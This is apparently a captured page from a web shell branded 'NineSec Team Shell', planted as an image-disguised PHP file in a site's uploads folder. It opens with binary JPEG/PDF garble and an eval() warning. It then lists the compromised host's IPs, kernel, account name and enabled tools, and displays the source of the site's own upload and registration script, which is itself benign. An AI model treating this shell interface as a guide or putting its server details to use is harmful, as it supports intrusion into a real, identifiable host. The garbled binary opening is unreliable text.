JFIF``;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90 C  %PDF-1.3 % 1 0 obj<> endobj 2 0 obj<> endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream x\mo7 a?Hyi{$E(i?ckrAvEzFHI|H?{|Z|X|Ň77?Oݞ__lOя77wx'?Ű8I] gQB2za]l|ɇ՟?} " L* & J * j .  N (8HXhx )9IYiy *:JZjz +;K[k{ , C> r. ^ ~ N @ qO!  ` ( S A  a=  ! wQ It Ba @l q T  f !U* A 9%n o M - 5J  w@O|l:Bg y= B=jq K - jM 4EP N q f ^ u> $k ( H l EW o W  %l d] 6 ] - L  > 9 t* y 4 b 5 Q\ \ v U  2c 3  c qM = |  IT: S |{; ^| e]/ n3g _ > t! y {  Zm \{o]'S ~ VN a w - u x* " 3 }$jH q w bx B" < 5b }% + 09_h>G u7$ y MJ$ Y&X z (r ` [N _pny!lu o x `N d z Oy O.* r  _s iQ  BRx .) _6jV ] # W RVy k~ cI Y H  dsR  rZ+ )f d v* ' i G j * cB zi  _  j z[ 7; 2 -  zZ  f V z9 JR n  72 81 [e n &ci ( r  U q _+q rV 3  " > ;1 0x >{ |` r h W q f 3 l ]u b-5 Fwm z zp)M ) jO q u q  E K l 7  [[ y Xg e ~ , 9  k; +ny  )s=9) u_l " Z ; x =. M= +? ^  q $ .[ i [ Fj y Ux { >_ xH  > ; 8 < w/l hy  9o <: 'f4 |   w e  G G * !# b` B,  $*q Ll   (Jq T r ,jq \   0 q d,  4 q ll   8 q t  < q |   @ r , ! D*r l # HJr %/ Ljr '? P r , ) Q; gzuncompress
Warning: file_get_contents(test.txt): Failed to open stream: No such file or directory in /home/u178500310/domains/princess.uaeclick.com/public_html/uploads/1770357389_0_197006009.php(44) : eval()'d code on line 6
NineSec Team Shell
NineSec Team Shell
Server IP : 82.25.113.252  /  Your IP : 216.73.216.172
Web Server : LiteSpeed
System : Linux fr-int-web2058.main-hosting.eu 5.14.0-570.62.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 10:10:59 EST 2025 x86_64
User : u178500310 ( 178500310)
PHP Version : 8.2.29
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF
Directory (0755) :  /home/u178500310/domains/pinkrosesentertainment.com/public_html/


Current File : /home/u178500310/domains/pinkrosesentertainment.com/public_html/submit.php
<?php
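include 'db_connect.php'; // expected to define $conn; it is used below like a mysqli connection

/**
 * Store one uploaded image from $_FILES and return the path it was saved to.
 *
 * The file is accepted only if the upload succeeded, it is at most 1MB, the
 * client-supplied name ends in an allowed image extension, and the file
 * content itself is recognised as JPEG, PNG or GIF.
 *
 * The stored name is generated on the server and the stored extension is
 * derived from the detected image type. Nothing from the client-supplied
 * file name reaches the filesystem, so a crafted name cannot choose the
 * extension or the location of the stored file.
 *
 * NOTE(review): a valid image header does not prove the rest of the file is
 * harmless, because bytes can follow the image data. The default folder is a
 * relative path, so it presumably resolves under the document root — confirm
 * that the web server never executes scripts from it.
 *
 * @param string $fieldname Name of the file input in the submitted form.
 * @param string $folder    Destination directory, with trailing slash.
 *
 * @return string|null Path of the stored file, or null when no file was
 *                     uploaded for this field or the upload reported an error.
 *                     Validation and storage failures end the request via die().
 */
function handleFileUpload(string $fieldname, string $folder = "uploads/"): ?string
{
    if (!isset($_FILES[$fieldname]) || $_FILES[$fieldname]['error'] !== UPLOAD_ERR_OK) {
        return null;
    }

    $file = $_FILES[$fieldname];
    if ($file['size'] > 1024 * 1024) { // 1MB limit
        die("Error: File {$fieldname} exceeds 1MB.");
    }

    // First gate: the extension the client claims must be on the allow-list.
    $claimedExt = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!in_array($claimedExt, ['jpg', 'jpeg', 'png', 'gif'], true)) {
        die("Error: Invalid file type for {$fieldname}.");
    }

    // Second gate: the content must parse as one of the allowed image types.
    // The stored extension comes from this result, not from the client name.
    $extensionByType = [
        IMAGETYPE_JPEG => 'jpg',
        IMAGETYPE_PNG  => 'png',
        IMAGETYPE_GIF  => 'gif',
    ];
    $imageInfo = getimagesize($file['tmp_name']);
    $storedExt = is_array($imageInfo) ? ($extensionByType[$imageInfo[2]] ?? null) : null;
    if ($storedExt === null) {
        die("Error: Invalid file type for {$fieldname}.");
    }

    // 0755 instead of 0777: other local accounts have no reason to write here.
    if (!is_dir($folder) && !mkdir($folder, 0755, true) && !is_dir($folder)) {
        die("Error: Failed to upload {$fieldname}.");
    }

    // Unpredictable server-side name; uniqid() is time-based and guessable.
    $targetPath = $folder . bin2hex(random_bytes(16)) . '.' . $storedExt;

    if (!move_uploaded_file($file['tmp_name'], $targetPath)) {
        die("Error: Failed to upload {$fieldname}.");
    }

    return $targetPath;
}

// Only handle a real form submission sent via POST.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['submit'])) {

    $input = $_POST['input'] ?? null;
    if (!is_array($input)) {
        http_response_code(400);
        die("Error: Invalid form submission.");
    }

    // Form keys in the same order as the columns of the INSERT below
    // ('Date_of_Birth' feeds the `dob` column).
    $formKeys = [
        'type',
        'enquiry_for',
        'name',
        'email',
        'contact_number',
        'Date_of_Birth',
        'address',
        'city',
        'state',
        'country',
        'qualification',
        'profession',
    ];

    // Values are bound as statement parameters, so they are passed through
    // unescaped: escaping them first would store literal backslashes
    // (O'Brien would be saved as O\'Brien).
    $values = [];
    foreach ($formKeys as $key) {
        $value = $input[$key] ?? ($key === 'type' ? 'Miss Registration' : '');
        if (!is_string($value)) {
            // Nested arrays (input[name][]=...) are not valid field values.
            http_response_code(400);
            die("Error: Invalid form submission.");
        }
        $values[] = $value;
    }

    // The first photo is mandatory; check it before storing the second one
    // so a rejected request does not leave a stray file behind.
    $photo1 = handleFileUpload('attachment');
    if (!$photo1) {
        die("First photo is required and must be valid.");
    }
    $photo2 = handleFileUpload('attachment2');

    $values[] = $photo1;
    $values[] = $photo2;

    $stmt = $conn->prepare("INSERT INTO registrations 
        (type, enquiry_for, name, email, contact_number, dob, address, city, state, country, qualification, profession, photo1, photo2)
        VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)");

    $saved = false;
    if ($stmt !== false) {
        $stmt->bind_param(str_repeat('s', count($values)), ...$values);
        $saved = $stmt->execute();
        if (!$saved) {
            // Keep driver details in the server log; they describe the schema.
            error_log('registration insert failed: ' . $stmt->error);
        }
        $stmt->close();
    } else {
        error_log('registration insert could not be prepared: ' . $conn->error);
    }
    $conn->close();

    if ($saved) {
        // The redirect header must be sent before any output.
        header("Location: registration.php?success=1");
        exit;
    }

    // The row was not written, so the stored files have no owner.
    foreach ([$photo1, $photo2] as $storedPath) {
        if (is_string($storedPath) && is_file($storedPath)) {
            unlink($storedPath);
        }
    }

    http_response_code(500);
    echo "<h2 style='color:red;'>❌ Error: registration could not be saved.</h2>";
} else {
    echo "No form submission detected.";
}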

NineSec Team - 2022